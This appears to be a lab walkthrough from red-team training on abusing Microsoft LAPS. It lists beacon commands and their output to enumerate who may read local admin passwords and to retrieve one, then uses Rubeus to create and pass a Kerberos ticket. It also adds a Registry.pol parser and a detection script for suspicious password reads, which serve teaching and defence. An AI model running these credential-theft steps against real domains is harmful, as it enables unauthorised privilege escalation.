Finding Presence
If LAPS is applied to a machine that you have access to, AdmPwd.dll (the LAPS client-side extension) will be on disk.
beacon> ls C:\Program Files\LAPS\CSE
Size Type Last Modified Name
---- ---- ------------- ----
179kb   fil   05/05/2021 07:04:14  AdmPwd.dll
We could also search for GPOs that have "LAPS" or some other descriptive term in the name.
beacon> powershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
usncreated : 25966
displayname : LAPS
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{C6DC5466-785A-11D2-84D0-00C04FB169F7}{942A8E4F-A261-11D1-A760-00C04FB9603F}][{D76B9641-3288-4F75-942D-087DE603E3EA}{D02B1F72-3407-48AE-BA88-E8213C6761F1}]
whenchanged : 8/16/2022 12:39:45 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 26068
dscorepropagationdata : {9/7/2022 1:05:58 PM, 1/1/1601 12:00:00 AM}
name : {2BE4337D-D231-4D23-A029-7B999885E659} # GPO ID
We can also look for computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null, since the LAPS client sets it on every machine it manages.
beacon> powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
dnshostname
-----------
wkstn-2.dev.cyberbotic.io
web.dev.cyberbotic.io
sql-2.dev.cyberbotic.io
wkstn-1.dev.cyberbotic.io
Downloading Info
If we locate the correct GPO, we can download the LAPS configuration from the gpcfilesyspath.
beacon> ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/16/2022 12:39:19 Applications
dir 09/13/2022 15:38:58 Microsoft
dir 08/16/2022 12:23:37 Preferences
dir 08/16/2022 12:21:04 Scripts
575b fil 08/16/2022 12:22:23 comment.cmtx
920b fil 08/16/2022 12:22:23 Registry.pol
beacon> download \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.pol
[*] started download of \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.pol (920 bytes)
[*] download of Registry.pol is complete
Use Parse-PolFile (from the GPRegistryPolicyParser PowerShell module) to convert this file into a human-readable format.
PS C:\Users\Attacker> Parse-PolFile .\Desktop\Registry.pol
KeyName : Software\Policies\Microsoft Services\AdmPwd
ValueName : PasswordComplexity
ValueType : REG_DWORD
ValueLength : 4
ValueData : 3
KeyName : Software\Policies\Microsoft Services\AdmPwd
ValueName : PasswordLength
ValueType : REG_DWORD
ValueLength : 4
ValueData : 14
KeyName : Software\Policies\Microsoft Services\AdmPwd
ValueName : PasswordAgeDays
ValueType : REG_DWORD
ValueLength : 4
ValueData : 30
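Registry.pol is a small binary format, so the same conversion can be done offline without the PowerShell module. The following Python is an added example (not code from this page, the course, or the LAPS project) that parses a Registry.pol into records with the same fields Parse-PolFile prints and then picks out the AdmPwd settings. The file bytes it parses are a constructed fixture reproducing the three values shown above plus one constructed REG_SZ entry (AdminAccountName = "LocalAdmin"); the complexity labels follow the LAPS ADMX template's four options.

```python
import struct
import sys

# Registry.pol layout (Microsoft "Registry Policy File Format"): a 4-byte "PReg"
# signature, a little-endian DWORD version (1), then records written as
# [key;value;type;size;data] where the brackets and semicolons are UTF-16LE
# characters, key and value are null-terminated UTF-16LE strings, type and
# size are DWORDs, and data is `size` raw bytes.
REG_SZ, REG_EXPAND_SZ, REG_BINARY, REG_DWORD = 1, 2, 3, 4
TYPE_NAMES = {REG_SZ: "REG_SZ", REG_EXPAND_SZ: "REG_EXPAND_SZ",
              REG_BINARY: "REG_BINARY", REG_DWORD: "REG_DWORD"}
LAPS_KEY = "Software\\Policies\\Microsoft Services\\AdmPwd"
# PasswordComplexity values as listed in the LAPS ADMX template.
COMPLEXITY = {1: "uppercase", 2: "uppercase + lowercase",
              3: "uppercase + lowercase + digits",
              4: "uppercase + lowercase + digits + specials"}


def _u16(s):
    return s.encode("utf-16-le")


def build_pol(entries):
    """Serialise (key, value_name, type, data) tuples into Registry.pol bytes.
    Only used here to construct an offline test fixture."""
    out = b"PReg" + struct.pack("<I", 1)
    for key, name, vtype, data in entries:
        if vtype == REG_DWORD:
            raw = struct.pack("<I", data)
        elif vtype in (REG_SZ, REG_EXPAND_SZ):
            raw = _u16(data + "\x00")
        else:
            raw = bytes(data)
        out += (_u16("[") + _u16(key + "\x00") + _u16(";") + _u16(name + "\x00")
                + _u16(";") + struct.pack("<I", vtype) + _u16(";")
                + struct.pack("<I", len(raw)) + _u16(";") + raw + _u16("]"))
    return out


def _read_wstr(buf, pos):
    """Read a null-terminated UTF-16LE string at pos; return (text, pos after terminator)."""
    end = pos
    while buf[end:end + 2] != b"\x00\x00":   # step one UTF-16 code unit at a time
        end += 2
        if end >= len(buf):
            raise ValueError("unterminated string at offset %d" % pos)
    return buf[pos:end].decode("utf-16-le"), end + 2


def _expect(buf, pos, ch):
    if buf[pos:pos + 2] != _u16(ch):
        raise ValueError("expected %r at offset %d" % (ch, pos))
    return pos + 2


def _decode(vtype, raw):
    if vtype == REG_DWORD and len(raw) == 4:
        return struct.unpack("<I", raw)[0]
    if vtype in (REG_SZ, REG_EXPAND_SZ):
        return raw.decode("utf-16-le").rstrip("\x00")
    return raw.hex()


def parse_pol(buf):
    """Parse Registry.pol bytes into records shaped like Parse-PolFile's output."""
    if buf[:4] != b"PReg":
        raise ValueError("missing PReg signature: not a Registry.pol file")
    if struct.unpack_from("<I", buf, 4)[0] != 1:
        raise ValueError("unsupported Registry.pol version")
    pos, records = 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, "[")
        key, pos = _read_wstr(buf, pos)
        pos = _expect(buf, pos, ";")
        name, pos = _read_wstr(buf, pos)
        pos = _expect(buf, pos, ";")
        vtype = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        size = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        raw = buf[pos:pos + size]
        if len(raw) != size:
            raise ValueError("truncated data at offset %d" % pos)
        pos = _expect(buf, pos + size, "]")
        records.append({"KeyName": key, "ValueName": name,
                        "ValueType": TYPE_NAMES.get(vtype, "type %d" % vtype),
                        "ValueLength": size, "ValueData": _decode(vtype, raw)})
    return records


def laps_settings(records):
    """Collect the AdmPwd values and annotate the complexity setting."""
    out = {r["ValueName"]: r["ValueData"] for r in records
           if r["KeyName"].lower() == LAPS_KEY.lower()}
    if "PasswordComplexity" in out:
        out["ComplexityDescription"] = COMPLEXITY.get(out["PasswordComplexity"], "unknown")
    return out


# Constructed fixture: the three values from the page plus a constructed REG_SZ entry.
SAMPLE_POL = build_pol([
    (LAPS_KEY, "PasswordComplexity", REG_DWORD, 3),
    (LAPS_KEY, "PasswordLength", REG_DWORD, 14),
    (LAPS_KEY, "PasswordAgeDays", REG_DWORD, 30),
    (LAPS_KEY, "AdminAccountName", REG_SZ, "LocalAdmin"),
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_POL
    for rec in parse_pol(data):
        print(rec)
    print(laps_settings(parse_pol(data)))
```

Run it with a path to a downloaded Registry.pol, or with no argument to parse the built-in fixture. Because the policy lives in SYSVOL, which every domain user can read, the password length, complexity and rotation interval are not secrets; what must stay protected is the ms-Mcs-AdmPwd attribute itself.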
Impersonating users who can access LAPS
Discover which principals are allowed to read the ms-Mcs-AdmPwd attribute.
beacon> powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier | fl
ObjectDN SecurityIdentifier
-------- ------------------
CN=WKSTN-2,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1107
CN=WEB,OU=Web Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=SQL-2,OU=SQL Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1107
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
DEV\Developers
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1108
DEV\Support Engineers
Users in the Developers group and the Support Engineers group can read the LAPS password (Developers on the workstations and Support Engineers on the servers, per the ACEs above).
beacon> powershell Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd
ms-mcs-admpwd
-------------
1N3FyjJR5L18za
Create a TGT using the LAPS credentials and pass the ticket
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:LapsAdmin /password:1N3FyjJR5L18za /nowrap
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:LapsAdmin /password:FakePass /ticket:doIFwj[...]MuSU8= /ptt
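From the defensive side, the ACL enumeration above tells you who is allowed to read ms-Mcs-AdmPwd, and the matching detection is auditing the reads themselves: with a SACL on the attribute (LAPS ships Set-AdmPwdAuditing in AdmPwd.PS for this), each read is logged as security event 4662 carrying the ReadProperty access mask (0x10) and the attribute's schemaIDGUID. The Python below is an added example, not from this page or the course: the 4662 records and the allow-list of accounts are constructed, and the attribute GUID is a placeholder because the real value is generated per forest when the LAPS schema extension is installed. It flags reads by accounts outside the allow-list, and allow-listed accounts that read the password of several computers in a short window, which is what a bulk dump of the attribute looks like in the log.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# PLACEHOLDER: the schemaIDGUID of ms-Mcs-AdmPwd differs in every forest; read the real
# one from the schema partition (e.g. Get-ADObject ... -Properties schemaIDGUID).
ADMPWD_ATTR_GUID = "{00000000-0000-0000-0000-000000000000}"
OTHER_ATTR_GUID = "{11111111-1111-1111-1111-111111111111}"  # constructed, unrelated attribute
READ_PROPERTY = 0x10  # ADS_RIGHT_DS_READ_PROP bit of the 4662 AccessMask


def dn(name, ou):
    return "CN=%s,OU=%s,DC=dev,DC=cyberbotic,DC=io" % (name, ou)


# Constructed 4662 records reduced to the fields the check uses (SubjectUserName,
# ObjectName, AccessMask and the Properties GUID list in the real event).
EVENTS = [
    {"time": "2022-09-13T15:40:01", "user": "DEV\\helpdesk1", "object": dn("WKSTN-1", "Workstations"), "mask": 0x10, "props": [ADMPWD_ATTR_GUID]},
    {"time": "2022-09-13T15:40:09", "user": "DEV\\helpdesk1", "object": dn("WKSTN-2", "Workstations"), "mask": 0x10, "props": [OTHER_ATTR_GUID]},
    {"time": "2022-09-13T15:41:30", "user": "DEV\\nlamb", "object": dn("WKSTN-1", "Workstations"), "mask": 0x10, "props": [ADMPWD_ATTR_GUID]},
    {"time": "2022-09-13T15:42:00", "user": "DEV\\helpdesk2", "object": dn("WKSTN-1", "Workstations"), "mask": 0x10, "props": [ADMPWD_ATTR_GUID]},
    {"time": "2022-09-13T15:42:03", "user": "DEV\\helpdesk2", "object": dn("WKSTN-2", "Workstations"), "mask": 0x10, "props": [ADMPWD_ATTR_GUID]},
    {"time": "2022-09-13T15:42:05", "user": "DEV\\helpdesk2", "object": dn("WEB", "Web Servers,OU=Servers"), "mask": 0x10, "props": [ADMPWD_ATTR_GUID]},
    {"time": "2022-09-13T15:42:08", "user": "DEV\\helpdesk2", "object": dn("SQL-2", "SQL Servers,OU=Servers"), "mask": 0x10, "props": [ADMPWD_ATTR_GUID]},
    {"time": "2022-09-13T15:42:10", "user": "DEV\\helpdesk2", "object": dn("WEB", "Web Servers,OU=Servers"), "mask": 0x20, "props": [ADMPWD_ATTR_GUID]},
]
# Constructed allow-list: accounts expected to read LAPS passwords as part of their job.
APPROVED = {"DEV\\helpdesk1", "DEV\\helpdesk2"}


def is_laps_read(ev):
    """True when the event is a ReadProperty on the ms-Mcs-AdmPwd attribute."""
    return bool(ev["mask"] & READ_PROPERTY) and ADMPWD_ATTR_GUID in ev["props"]


def detect(events, approved, threshold=3, window=timedelta(minutes=5)):
    """Return alerts as tuples: ("unapproved-read", user, object_dn) for readers outside
    the allow-list, and ("mass-read", user, count) for allow-listed readers that touch
    at least `threshold` distinct computers within `window`."""
    alerts, reads = [], defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if not is_laps_read(ev):
            continue  # writes and reads of other attributes are not in scope here
        if ev["user"] not in approved:
            alerts.append(("unapproved-read", ev["user"], ev["object"]))
            continue
        reads[ev["user"]].append((datetime.fromisoformat(ev["time"]), ev["object"]))
    for user, hist in reads.items():
        for i, (t0, _) in enumerate(hist):
            distinct = {obj for t, obj in hist[i:] if t - t0 <= window}
            if len(distinct) >= threshold:
                alerts.append(("mass-read", user, len(distinct)))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS, APPROVED):
        print(alert)
```

In a real deployment the allow-list should be derived from the same ACEs the enumeration above finds (the groups granted ReadProperty on ms-Mcs-AdmPwd), and the threshold tuned to how many machines a support account normally touches in a few minutes; one read of one workstation is routine, four different hosts in ten seconds is not.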